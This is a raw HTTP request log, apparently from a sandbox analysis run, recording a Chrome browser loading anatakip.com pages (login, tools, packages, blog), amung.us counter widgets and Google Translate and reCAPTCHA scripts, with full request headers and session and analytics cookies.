Source: global trafficHTTP traffic detected: GET /classic/14/1431.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/56.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1431.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/logo/favicon.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /classic/00/56.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /assets/style/instastyle.css?v=2.4 HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://anatakip.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1454.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1454.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/loginAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /tools HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/toolsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/57.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/57.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /packages HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.0.1716764274.0.0.0; _ga=GA1.1.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/packagesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.0.1716764274.0.0.0; _ga=GA1.1.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1365.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1365.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /blog HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764277.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/blogAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764277.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1391.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/53.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1391.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/53.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764282.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764282.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1371.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/13/1371.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764287.0.0.0; _ga=GA1.2.1095029423.1716764258
